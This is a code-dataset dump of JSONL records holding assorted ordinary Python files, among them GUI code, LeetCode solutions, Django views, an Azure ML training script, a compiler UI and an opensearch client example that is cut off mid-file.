flag=wx.EXPAND|wx.TOP|wx.LEFT|wx.RIGHT|wx.GROW, border=10)\n\t\t########################### End of constructing panel ######################################\n\t\tself.panel.SetSizer (sizer)\n\t\t\n\t\t############################# Setting visvis #######################################\n\t\tFigure = app.GetFigureClass()\n\t\tself.fig = Figure(self)\n\t\t\n\t\tboxsizer = wx.BoxSizer (wx.HORIZONTAL)\n\t\tboxsizer.Add(self.panel, 0.5, wx.EXPAND)\n\t\tboxsizer.Add(self.fig._widget, 2, wx.EXPAND)\n\t\t\n\t\t#########################################################################################\t\t\t\n\t\tself.SetSizer (boxsizer)\n\t\tself.SetAutoLayout(True)\n\t\tself.Layout() \n\t\t\n#########################################################################\n\nif __name__ == '__main__' :\n\tapp = visvis.use('wx')\n\tapp.Create()\n\tODDExperiment (None)\n\tapp.Run()","sub_path":"util/get_transform_limited_phase/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"127451447","text":"\"\"\"Rotate Image\"\"\"\n\nclass Solution(object):\n def rotate(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n :rtype: None Do not return anything, modify matrix in-place instead.\n \"\"\"\n #solution 1\n A[:] = zip(*A[::-1])\n\n\n #solution 2\n n = len(matrix[0])\n m = len(matrix)\n\n for i in range(n):\n for j in range(i, m):\n matrix[i][j], matrix[j][i] = matrix[j][i], matrix[i][j]\n\n for i in range(n):\n matrix[i].reverse()\n\n\n\n \n","sub_path":"48.py","file_name":"48.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"14695521","text":"#============= enthought library imports =======================\nfrom enthought.traits.api import HasTraits, List, Instance\nfrom enthought.traits.ui.api import View, Item, Handler, \\\n TableEditor\nfrom enthought.traits.ui.table_column import ObjectColumn\n\n#============= standard library imports ========================\n\n#============= local library imports ==========================\nfrom src.database.pychron_database_adapter import PychronDatabaseAdapter\nclass DatabaseTableHandler(Handler):\n def init(self, info):\n '''\n @type info: C{str}\n @param info:\n '''\n info.object.load()\n\nclass DatabaseTableView(HasTraits):\n '''\n G{classtree}\n '''\n items = List\n database = Instance(PychronDatabaseAdapter)\n klass = None\n def traits_view(self):\n '''\n '''\n table = Item('items', show_label = False,\n editor = self.get_table_editor())\n v = View(table,\n handler = DatabaseTableHandler)\n return v\n\n def _table_editor_factory(self, kw):\n '''\n @type kw: C{str}\n @param kw:\n '''\n return TableEditor(**kw)\n\n def get_table_columns(self):\n '''\n '''\n cols = [\n ObjectColumn(name = 'id', editable = False),\n ObjectColumn(name = 'name', editable = False),\n ]\n return cols\n\n def row_factory(self):\n '''\n '''\n if self.klass is not None:\n item = self.klass()\n self._pre_add(item)\n info = item.edit_traits(kind = 'modal')\n if info.result:\n if self.database.connected:\n if self._add_row(item):\n self.items.append(item)\n\n def _pre_add(self, item):\n '''\n @type item: C{str}\n @param item:\n \n subclasses should override this method to load enumeditor lists\n '''\n\n pass\n\n def _add_row(self, item):\n '''\n '''\n pass\n\n\n def load(self, sess = None, refresh = True):\n '''\n @type sess: C{str}\n @param sess:\n\n @type refresh: C{str}\n @param refresh:\n '''\n self.items = []\n if self.database.connected:\n getter = getattr(self.database, 'get_%ss' % self.id)\n items, sess = getter(sess = sess)\n\n if self.klass is not None:\n for i in items:\n nu = self.klass()\n for attr in dir(i):\n if attr[:1] != '_' and attr != 'metadata':\n nu.trait_set(**{attr:str(getattr(i, attr))})\n\n self.items.append(nu)\n\n return sess\n\n#============= views ===================================\n#============= EOF ====================================\n","sub_path":"src/database/plugins/views/database_table_view.py","file_name":"database_table_view.py","file_ext":"py","file_size_in_byte":2902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"401931245","text":"from classtools import AttrDisplay\n\nclass Person(AttrDisplay):\n\n def __init__(self, name, salary=0):\n self.name = name\n self.salary = salary\n\n def giveraise(self, percent):\n self.salary = self.salary*(1 + (percent/100))\n\n\nclass Manager(Person):\n\n def __init__(self, name, salary, xobcode ='Mgr'):\n Person.__init__(self, name, salary)\n self.xobcode = xobcode\n\n\nA = Person('Raj', 30000)\nB = Manager('Garuda', 40000)\n\nprint('person is', A)\nB.giveraise(40)\nprint('Person B', B)\n\n\nclass Super:\n def delegate(self):\n self.action()\n\n\nclass Provider(Super):\n def action(self):\n print('kai zhala')\n\n\nif __name__ == '__main__':\n A = Provider()\n A.delegate()\n\n","sub_path":"testclasstool.py","file_name":"testclasstool.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"309202109","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 15 10:32:04 2018\n\n@author: thieunv\n\nGetter and Setter method: https://www.youtube.com/watch?v=jCzT9XFZ5bw\n \nIf we want use decorator in python 2. The class must inheritance from object\n\"\"\"\n\n\nclass Employee(object):\n \n def __init__(self, first, last):\n self.first = first\n self.last = last\n \n @property # Using attribute like a method, getter\n def email(self):\n return \"{}.{}@gmail.com\".format(self.first, self.last)\n \n @property\n def fullname(self):\n return \"{} {}\".format(self.first, self.last)\n \n @fullname.setter\n def fullname(self, name):\n first, last = name.split(\" \")\n self.first = first\n self.last = last\n \n @fullname.deleter\n def fullname(self):\n print(\"Delete Name!\")\n self.first = None\n self.last = None\n \n# Instance\ne1 = Employee(\"nguyen\", \"thieu\")\ne1.fullname = \"truong khang\"\n\nprint (e1.first)\nprint (e1.email)\nprint (e1.fullname)\n\ndel e1.fullname\nprint (e1.first)\nprint (e1.email)\nprint (e1.fullname)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"6_google_trace/tensorflow/exam6.py","file_name":"exam6.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"217791821","text":"# -*- coding: utf-8 -*- #\n# Copyright 2021 Google LLC. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Cloud vmware Clusters client.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nfrom apitools.base.py import list_pager\nfrom googlecloudsdk.api_lib.vmware import util\n\n\nclass ClustersClient(util.VmwareClientBase):\n \"\"\"cloud vmware Clusters client.\"\"\"\n\n def __init__(self):\n super(ClustersClient, self).__init__()\n self.service = self.client.projects_locations_privateClouds_clusters\n\n def Get(self, resource):\n request = self.messages.VmwareengineProjectsLocationsPrivateCloudsClustersGetRequest(\n name=resource.RelativeName())\n return self.service.Get(request)\n\n def Create(self,\n resource,\n node_type=None,\n node_count=None):\n parent = resource.Parent().RelativeName()\n cluster_id = resource.Name()\n cluster = self.messages.Cluster(\n nodeCount=node_count, nodeTypeId=node_type)\n request = self.messages.VmwareengineProjectsLocationsPrivateCloudsClustersCreateRequest(\n parent=parent,\n cluster=cluster,\n clusterId=cluster_id)\n\n return self.service.Create(request)\n\n def Delete(self, resource):\n request = self.messages.VmwareengineProjectsLocationsPrivateCloudsClustersDeleteRequest(\n name=resource.RelativeName())\n return self.service.Delete(request)\n\n def List(self,\n private_cloud_resource,\n filter_expression=None,\n limit=None,\n page_size=None,\n sort_by=None):\n private_cloud = private_cloud_resource.RelativeName()\n request = self.messages.VmwareengineProjectsLocationsPrivateCloudsClustersListRequest(\n parent=private_cloud, filter=filter_expression)\n if page_size:\n request.page_size = page_size\n return list_pager.YieldFromList(\n self.service,\n request,\n limit=limit,\n batch_size_attribute='pageSize',\n batch_size=page_size,\n field='clusters')\n\n def Update(self,\n resource,\n node_count=None):\n cluster = self.messages.Cluster(\n nodeCount=node_count)\n request = self.messages.VmwareengineProjectsLocationsPrivateCloudsClustersPatchRequest(\n name=resource.RelativeName(),\n cluster=cluster)\n return self.service.Patch(request)\n","sub_path":"google-cloud-sdk/lib/googlecloudsdk/api_lib/vmware/clusters.py","file_name":"clusters.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"284052957","text":"from django.shortcuts import render, redirect\nfrom .forms import StaffForm\nfrom .models import Staff\n\n# Create your views here.\n\ndef staff_list(request):\n context = {'staff_list' :Staff.objects.all()}\n return render(request,\"staff_register/staff_list.html\",context)\n\ndef staff_form(request,id=0):\n if request.method == \"GET\":\n if id==0:\n form = StaffForm()\n else:\n staff = Staff.objects.get(pk=id)\n form = StaffForm(instance=staff)\n return render(request,\"staff_register/staff_form.html\",{'form':form})\n else:\n if id == 0:\n form = StaffForm(request.POST)\n else:\n staff = Staff.objects.get(pk=id)\n form = StaffForm(request.POST,instance = staff)\n if form.is_valid():\n form.save()\n return redirect('/staff/list')\n\n\ndef staff_delete(request,id):\n staff = Staff.objects.get(pk=id)\n staff.delete()\n return redirect('/staff/list')\n","sub_path":"staff_project/staff_register/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"137983371","text":"# residual_skills.py\n# -------\n# Writes a new CSV with abnormal percentage skills\nimport pandas as pd\nimport statsmodels.formula.api as sm\n\n\ndef write_abn_skills(skills_file_name, market_file_name, output_name):\n # Create file\n g = open(output_name, \"w+\")\n header = \"DATE,TICKER,ABN_PERCENT\\n\"\n g.write(header)\n\n # For ols regression step\n date = [] # list of DATE\n ticker = [] # list of TICKER\n skills = [] # list of PERCENT skills\n mc = [] # list of LN_MCAP\n bm = [] # list of BM\n mom = [] # list of MOM\n # prepare industry dummy lists, n-1 are permitted with NAICS \"11\" omitted\n industry_to_values = {}\n permitted_inds = [\"21\", \"22\", \"23\", \"31\", \"42\", \"44\", \"48\", \"51\", \"52\", \"53\", \"54\", \"55\", \"56\", \"61\",\n \"62\", \"71\", \"72\", \"81\", \"92\"]\n for ind in permitted_inds:\n industry_to_values[ind] = []\n\n skills_f = open(skills_file_name)\n skills_f.readline() # skip header\n skills_lines = skills_f.readlines()\n skills_index = 0\n terminate = False\n with open(market_file_name) as market_f:\n skip = True\n for line in market_f:\n if skip:\n skip = False\n continue\n # split line: 0:DATE,1:TICKER,2:LN_MCAP,3:BM,4:INDUSTRY,5:MOM\n current_market = line.rstrip('\\n').split(',')\n # split line: 0:DATE,1:TICKER,2:PERCENT\n current_skills = skills_lines[skills_index].rstrip('\\n').split(',')\n # market date must be in YYYYMM format\n current_market[0] = current_market[0][:6]\n # check date alignment\n if current_market[0] < current_skills[0]:\n continue\n while current_skills[0] < current_market[0]:\n skills_index += 1\n if skills_index >= len(skills_lines):\n terminate = True\n break\n current_skills = skills_lines[skills_index].rstrip('\\n').split(',')\n if terminate:\n break\n # updated skills ticker passes current market ticker or updated skills date passes current market date\n if current_market[0] < current_skills[0] or current_market[1] < current_skills[1]:\n continue\n while current_skills[1] < current_market[1]:\n skills_index += 1\n if skills_index >= len(skills_lines):\n terminate = True\n break\n current_skills = skills_lines[skills_index].rstrip('\\n').split(',')\n # make sure date still aligned\n if current_market[0] < current_skills[0]:\n break\n if terminate:\n break\n # updated skills ticker passes current market ticker or updated skills date passes current market date\n if current_market[0] < current_skills[0] or current_market[1] < current_skills[1]:\n continue\n date.append(current_skills[0])\n ticker.append(current_skills[1])\n # add to regression data\n skills.append(float(current_skills[2]))\n mc.append(float(current_market[2]))\n bm.append(float(current_market[3]))\n mom.append(float(current_market[5]))\n for ind in permitted_inds:\n if current_market[4] == ind:\n industry_to_values[ind].append(1)\n else:\n industry_to_values[ind].append(0)\n # Create pandas data frame and run regression with statsmodels\n df = pd.DataFrame({\"Y\": skills, \"B\": mc, \"C\": bm,\n \"D\": industry_to_values[\"21\"], \"E\": industry_to_values[\"22\"], \"F\": industry_to_values[\"23\"],\n \"G\": industry_to_values[\"31\"], \"H\": industry_to_values[\"42\"], \"I\": industry_to_values[\"44\"],\n \"J\": industry_to_values[\"48\"], \"K\": industry_to_values[\"51\"], \"L\": industry_to_values[\"52\"],\n \"M\": industry_to_values[\"53\"], \"N\": industry_to_values[\"54\"], \"O\": industry_to_values[\"55\"],\n \"P\": industry_to_values[\"56\"], \"Q\": industry_to_values[\"61\"], \"R\": industry_to_values[\"62\"],\n \"S\": industry_to_values[\"71\"], \"T\": industry_to_values[\"72\"], \"U\": industry_to_values[\"81\"],\n \"V\": industry_to_values[\"92\"], \"W\": mom})\n result = sm.ols(formula=\"Y ~ B + C + D + E + F + G + H + I + J + K + L + M + N + O + P + Q + R + S + T + U + V + W\",\n data=df).fit()\n # save ABN_PERCENT skills\n abn = list(result.resid)\n # write output\n for i in range(len(abn)):\n new_line = date[i] + \",\" + ticker[i] + \",\" + str(abn.pop(0)) + \"\\n\"\n g.write(new_line)\n g.close()\n\n\ninput_prefix = \"skills_current_\"\noutput_prefix = \"abn_skills_current_\"\nfor i in range(50):\n write_abn_skills(input_prefix + str(i) + \".csv\", \"market_measures.csv\", output_prefix + str(i) + \".csv\")\ninput_prefix = \"skills_join_\"\noutput_prefix = \"abn_skills_join_\"\nfor i in range(50):\n write_abn_skills(input_prefix + str(i) + \".csv\", \"market_measures.csv\", output_prefix + str(i) + \".csv\")\ninput_prefix = \"skills_leave_\"\noutput_prefix = \"abn_skills_leave_\"\nfor i in range(50):\n write_abn_skills(input_prefix + str(i) + \".csv\", \"market_measures.csv\", output_prefix + str(i) + \".csv\")\n","sub_path":"skills/human-capital/deprecated/residual_skills.py","file_name":"residual_skills.py","file_ext":"py","file_size_in_byte":5362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"581033651","text":"from django.urls import include, path\nfrom rest_framework import routers\nfrom vacine.api import views\n\nrouter = routers.DefaultRouter()\nrouter.register(r'users', views.UserViewSet)\nrouter.register(r'pacientes', views.PacienteViewSet)\n\nurlpatterns = [\n path('', include(router.urls)),\n path('api-auth/', include('rest_framework.urls', namespace='rest_framework'))\n]","sub_path":"backend/vacine/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"419329341","text":"class Solution:\r\n def removeDuplicates(self, nums: List[int]):\r\n if not nums:return 0\r\n length=len(nums)\r\n if length==1:return 1\r\n last=nums[0]\r\n for number in nums[1:]:\r\n if number==last:\r\n nums.remove(number)\r\n length-=1\r\n else:\r\n last=number\r\n return length\r\n#this seems really slow...\r\ndef removeDuplicates(self, nums: List[int]):\r\n if not nums:return 0\r\n if len(nums)==1:return 1\r\n tail=0\r\n for i in range(1,len(nums)):\r\n if nums[tail]!=nums[i]:\r\n tail+=1\r\n nums[tail]=nums[i]\r\n return tail+1\r\n#this is faster because it only changes pointer while the previous method modifies the whole array.\r\n","sub_path":"26_remove_duplicates_from_sorted_array.py","file_name":"26_remove_duplicates_from_sorted_array.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"629471552","text":"import logging\nimport logging.config\n\nif __name__ == '__main__' :\n myLogger=logging.getLogger('logtests')\n myLogger.setLevel(logging.DEBUG)\n\n myStreamHandler=logging.StreamHandler()\n myStreamHandler.setLevel(logging.DEBUG)\n myLogger.addHandler(myStreamHandler)\n\n myFormatter=logging.Formatter(\"%(asctime)s-%(name)s-%(msg)s\")\n myStreamHandler.setFormatter(myFormatter)\n\n myLogger.debug(\"This is a debug message.\")\n myLogger.warning(\"This is a warning message.\")\n\n","sub_path":"src/ex23/logtest.py","file_name":"logtest.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"502801050","text":"'''\r\n给你一个由 无重复 正整数组成的集合 nums ,请你找出并返回其中最大的整除子集 answer ,子集中每一元素对 (answer[i], answer[j]) 都应当满足:\r\nanswer[i] % answer[j] == 0 ,或\r\nanswer[j] % answer[i] == 0\r\n如果存在多个有效解子集,返回其中任何一个均可。\r\n\r\n示例 1:\r\n输入:nums = [1,2,3]\r\n输出:[1,2]\r\n解释:[1,3] 也会被视为正确答案。\r\n\r\n示例 2:\r\n输入:nums = [1,2,4,8]\r\n输出:[1,2,4,8]\r\n\r\n提示:\r\n1 <= nums.length <= 1000\r\n1 <= nums[i] <= 2 * 109\r\nnums 中的所有整数 互不相同\r\n'''\r\nfrom leetcode.tools.time import printTime\r\n\r\n\r\nclass Solution:\r\n '''\r\n 遍历 + 记忆化\r\n '''\r\n def largestDivisibleSubset(self, nums):\r\n ret = []\r\n #先排序\r\n nums = sorted(nums)\r\n def sub(nums):\r\n temps = []\r\n for num in nums:\r\n if len(temps) == 0:\r\n temps.append([num])\r\n else:\r\n l = len(temps)\r\n t2 = []\r\n #遍历temps\r\n for i in range(l):\r\n t = temps[i]\r\n #如果能整除最后一个元素,则能整除前面所有元素\r\n if num % t[len(t) - 1] == 0:\r\n t1 = t.copy()\r\n t1.append(num)\r\n #记录最长的集合\r\n if len(t1) > len(t2):\r\n t2 = t1\r\n #保存最长的集合\r\n if len(t2):\r\n temps.append(t2)\r\n #返回temps中最长的集合\r\n for i in range(len(temps) - 1):\r\n if len(temps) > 1 and len(temps[i]) > len(temps[i + 1]):\r\n t = temps[i]\r\n temps[i] = temps[i + 1]\r\n temps[i + 1] = t\r\n return temps[len(temps) - 1]\r\n for i in range(len(nums)):\r\n #如果能被ret[0]整除,以该元素开头的集合肯定小于ret,直接跳过\r\n if not len(ret) or (len(ret) and nums[i] % ret[0] != 0):\r\n temp = sub(nums[i:])\r\n if len(temp) > len(ret):\r\n ret = temp\r\n return ret\r\n '''\r\n DP\r\n '''\r\n @printTime()\r\n def _1largestDivisibleSubset(self, nums):\r\n nums = sorted(nums)\r\n self.len = len(nums)\r\n dp = [[] for i in range(self.len)]\r\n ret = []\r\n for i in range(self.len):\r\n for j in range(0, i):\r\n if nums[i] % nums[j] == 0 and dp[j].__len__() + 1 > dp[i].__len__():\r\n dp[i] = dp[j].copy()\r\n dp[i].append(nums[i])\r\n if dp[i].__len__() > ret.__len__():\r\n ret = dp[i]\r\n return ret\r\n\r\nnums = [1,2,4,8,16,32,64,128,256,512,1024,2048,4096,8192,16384,32768,65536,131072,262144,524288,1048576,2097152,4194304,8388608,16777216,33554432,67108864,134217728,268435456,536870912,1073741824]\r\nso = Solution()\r\nprint(so.largestDivisibleSubset(nums))\r\nSolution()._1largestDivisibleSubset(nums)","sub_path":"leetcode/0368_H_最大整除子集.py","file_name":"0368_H_最大整除子集.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"85431014","text":"import cs50\nimport csv\nimport sys\nimport cs50\n\n\n# Connect to database\ndb = cs50.SQL(\"sqlite:///students.db\")\n\n# Check if command-line argument was passed\nif len(sys.argv) != 2:\n print(\"Usage: python filename.py filename.csv\")\n exit()\n\n# Open provided CSV file\nwith open(sys.argv[1]) as csvfile:\n reader = csv.reader(csvfile, delimiter=',')\n for row in reader:\n # Get house of student\n house = row[1]\n\n # Get student's birth year\n birth_year = row[2]\n\n # Get student's names\n full_name = row[0].split(' ')\n\n # Do not include first row\n if len(full_name) == 1:\n continue\n\n # If middle name\n if len(full_name) == 3:\n first_name = full_name[0]\n middle_name = full_name[1]\n last_name = full_name[2]\n\n # Insert into database\n db.execute(\"INSERT INTO students (first, middle, last, house, birth) VALUES (:first, :middle, :last, :house, :birth)\",\n first=first_name, middle=middle_name, last=last_name, house=house, birth=birth_year)\n\n # If no middle name\n elif len(full_name) == 2:\n first_name = full_name[0]\n last_name = full_name[1]\n\n # Insert into database\n db.execute(\"INSERT INTO students (first, last, house, birth) VALUES (:first, :last, :house, :birth)\",\n first=first_name, last=last_name, house=house, birth=birth_year)","sub_path":"import.py","file_name":"import.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"649835137","text":"import argparse\nimport os\nimport pandas as pd\nimport numpy as np\nimport pickle\nimport json\n\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import GradientBoostingRegressor\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn_pandas import DataFrameMapper\nfrom sklearn.externals import joblib\nimport math\nimport azureml.core\nfrom azureml.core import Run\nfrom azureml.core.model import Model\n\nprint(\"In train.py\")\nprint(\"As a data scientist, this is where I write my training code.\")\n\nparser = argparse.ArgumentParser(\"train\")\n\nparser.add_argument(\"--model_name\", type=str, help=\"model name\", dest=\"model_name\", required=True)\n\nargs = parser.parse_args()\n\nprint(\"Argument 1: %s\" % args.model_name)\n\ndata_url = ('https://quickstartsws9073123377.blob.core.windows.net/'\n 'azureml-blobstore-0d1c4218-a5f9-418b-bf55-902b65277b85/'\n 'quickstarts/nyc-taxi-data/nyc-taxi-sample-data.csv')\n\ndf = pd.read_csv(data_url)\nx_df = df.drop(['totalAmount'], axis=1)\ny_df = df['totalAmount']\n\nX_train, X_test, y_train, y_test = train_test_split(x_df, y_df, test_size=0.2, random_state=0)\n\ncategorical = ['normalizeHolidayName', 'isPaidTimeOff']\nnumerical = ['vendorID', 'passengerCount', 'tripDistance', 'hour_of_day', 'day_of_week', \n 'day_of_month', 'month_num', 'snowDepth', 'precipTime', 'precipDepth', 'temperature']\n\nnumeric_transformations = [([f], Pipeline(steps=[\n ('imputer', SimpleImputer(strategy='median')),\n ('scaler', StandardScaler())])) for f in numerical]\n \ncategorical_transformations = [([f], OneHotEncoder(handle_unknown='ignore', sparse=False)) for f in categorical]\n\ntransformations = numeric_transformations + categorical_transformations\n\nclf = Pipeline(steps=[('preprocessor', DataFrameMapper(transformations)),\n ('regressor', GradientBoostingRegressor(max_depth=5))])\n\nclf.fit(X_train, y_train)\n\nos.makedirs('./outputs', exist_ok=True)\nmodel_file_name = args.model_name + '.pkl'\nwith open(model_file_name, 'wb') as file:\n joblib.dump(value=clf, filename=os.path.join('./outputs',\n model_file_name))\n\nrun = Run.get_context()\n\ny_predict = clf.predict(X_test)\ny_actual = y_test.values.flatten().tolist()\nrmse = math.sqrt(mean_squared_error(y_actual, y_predict))\nrun.log('rmse', rmse, 'The RMSE score on test data for GradientBoostingRegressor')\nprint('The RMSE score on test data for GradientBoostingRegressor: ', rmse)\n\nos.chdir(\"./outputs\")\n\nmodel_description = 'This model was trained using GradientBoostingRegressor.'\nmodel = Model.register(\n model_path=model_file_name, # this points to a local file\n model_name=args.model_name, # this is the name the model is registered as\n tags={\"type\": \"regression\", \"rmse\": rmse, \"run_id\": run.id},\n description=model_description,\n workspace=run.experiment.workspace\n)\n\nos.chdir(\"..\")\n\nprint(\"Model registered: {} \\nModel Description: {} \\nModel Version: {}\".format(model.name, \n model.description, model.version))\n\n\n\n\n\n","sub_path":"scripts/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"494748025","text":"from collections import deque\nfrom agents.agent import Agent\nimport numpy as np\nfrom task import Task\nimport tensorflow as tf\nimport json\n\ndef train(agent, task):\n rewards = deque(maxlen=100)\n summary = list()\n\n try:\n for episodeId in range(100000):\n episodeReward = 0.0\n state = task.reset()\n\n stepCount = 0\n while True:\n stepCount += 1\n action = agent.act(state)\n nextState, reward, done = task.step(action[0])\n agent.learn(nextState=nextState, reward=reward, done=done)\n state = nextState\n episodeReward += reward\n if done: break\n\n rewards.append(episodeReward)\n avgReward = np.mean(rewards)\n\n print(\"Episode: {} Reward: {:4.3f} Avg. reward: {:4.3f}\". \\\n format(episodeId, episodeReward, avgReward))\n\n summary.append({\n \"episodeId\": episodeId,\n \"reward\": episodeReward,\n \"averageReward\": avgReward,\n })\n finally:\n print(\"Dumping summary ...\")\n with open(\"summary.json\", \"w\") as summaryFile:\n json.dump(summary, summaryFile, indent=True)\n\nif __name__ == \"__main__\":\n task = Task()\n\n agent = Agent(\n stateDim=task.state_size,\n actionDim=task.action_size,\n actionBound=[task.action_low, task.action_high],\n actorLearningRate=0.0001,\n criticLearningRate=0.001,\n batchSize=64,\n tau=0.01,\n gamma=0.99,\n bufferSize=1000000,\n seed=1234)\n\n with tf.Session() as session:\n session.run(tf.global_variables_initializer())\n agent.set_session(session)\n train(agent, task)\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"45296149","text":"import tkinter as tk\nfrom compiler.rules import *\nfrom compiler.fsm import *\nfrom compiler.parse_table import *\n\n\nclass Application(tk.Frame):\n def __init__(self, master=None):\n super().__init__(master)\n self.pack()\n self.create_widgets()\n self.src = \"\"\n self.token_list = []\n\n def create_widgets(self):\n self.text_editor = tk.Entry(self, width=50)\n self.text_editor.bind('', self.set_text)\n self.text_editor.pack(side=\"top\")\n self.result = tk.Label(self)\n self.result.pack()\n self.test_text = tk.Text(self)\n self.test_text.pack()\n self.quit = tk.Button(self, text=\"QUIT\", fg=\"red\",\n command=root.destroy)\n self.quit.pack(side=\"bottom\")\n \n def get_text(self):\n self.src = self.text_editor.get()\n\n def set_text(self, event):\n self.get_text()\n lexer = Rules(self.src)\n lexer.run()\n self.test_text.insert('end', \"The action & goto table has been written to the file action_n_goto_table.txt\\n\", 'alert')\n self.test_text.tag_configure('alert', background='green', foreground='black')\n self.test_text.insert('end', '\\n')\n\n self.test_text.insert('end', \"Grammar\\n\", 'grammar')\n self.test_text.tag_configure('grammar', background='black', foreground='green')\n\n # output the grammmar\n g = \"\"\n for x in grammar:\n g += x.start_symbol\n g += \" ->\"\n for y in x.rhs:\n g += \" \"\n g += y\n g += '\\n'\n g += '\\n'\n\n self.test_text.insert('end', g)\n\n #output tokens\n self.test_text.insert('end', \"Token\\n\", 'token')\n self.test_text.tag_configure('token', background='black', foreground='green')\n\n for x in lexer.items:\n self.test_text.insert('end', x[0])\n self.test_text.insert('end', ' ')\n self.token_list.append(x)\n for x in range(0, 3):\n self.test_text.insert('end', '\\n')\n\n #output states\n self.test_text.insert('end', \"States:\\n\", 'states')\n self.test_text.tag_configure('states', foreground='green', background='black')\n\n fsm = FSM()\n fsm_res = fsm.output()\n\n #output goto sentences\n goto_flag = False\n for x in fsm_res:\n if not x[0].isdigit():\n if goto_flag == False:\n self.test_text.insert('end', 'Goto Sentences:\\n', 'goto')\n self.test_text.tag_configure('goto', foreground='green', background='black')\n goto_flag = True\n self.test_text.insert('end', x)\n self.test_text.insert('end', '\\n')\n self.test_text.insert('end', '\\n')\n\n #output parse stack\n self.test_text.insert('end', \"Parse Stack:\\n\", 'parse_stack')\n self.test_text.tag_configure('parse_stack', foreground='green', background='black')\n parse_table = Parse_table()\n parse_table.run(self.token_list)\n for x in parse_table.parse_steps:\n for y in x:\n self.test_text.insert('end', y + \" \")\n self.test_text.insert('end', '\\n')\n f = open('action_n_goto_table.txt', 'w')\n f.write(str(parse_table.action_goto_table))\n f.close()\n\nif __name__ == \"__main__\":\n root = tk.Tk()\n app = Application(master=root)\n app.mainloop()","sub_path":"compiler/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":3437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"374114805","text":"# coding=utf-8\nimport time\nimport asyncio\nfrom opensearch import const\nfrom opensearch import Client\nfrom opensearch import IndexDoc\nfrom opensearch import Search\n\n\napp_key = ''\napp_secret = ''\nbase_url = 'http://opensearch-cn-hangzhou.aliyuncs.com'\nindex_name = 'build_test_index_py27'\n\ndoc_id = 1000\ntable_name = 'main'\n\n\nasync def doc_add():\n client = Client(app_key, app_secret, base_url)\n indexDoc = IndexDoc(client, index_name)\n doc = {}\n doc['id'] = doc_id\n doc['owner_id'] = 1\n doc['catalog_id'] = [12, 34]\n doc['title'] = u\"this is a test title\"\n doc['text'] = u\"this is a test title OpenSearch\"\n doc['updated'] = 1439514278\n doc['created'] = 1439514278\n ret = await indexDoc.add(doc, table_name)\n client.session.close()\n time.sleep(5)\n print('add doc status: ', ret['status'])\n\n\nasync def doc_get():\n client = Client(app_key, app_secret, base_url)\n indexDoc = IndexDoc(client, index_name)\n ret = await indexDoc.get(doc_id, table_name)\n client.session.close()\n print(\"doc title: \", ret['result']['title'])\n\n\nasync def doc_update():\n client = Client(app_key, app_secret, base_url)\n indexDoc = IndexDoc(client, index_name)\n doc = {\"id\": doc_id, \"title\": \"this is a test title [modify]\", \"text\": \"this is a test title [modify] OpenSearch\"}\n ret = await indexDoc.add(doc, table_name)\n client.session.close()\n time.sleep(5)\n print('update doc status: ', ret['status'])\n\n\nasync def doc_after_update_get():\n client = Client(app_key, app_secret, base_url)\n indexDoc = IndexDoc(client, index_name)\n ret = await indexDoc.get(doc_id, table_name)\n client.session.close()\n print(\"doc title: \", ret['result']['title'])\n\n\nasync def search():\n client = Client(app_key, 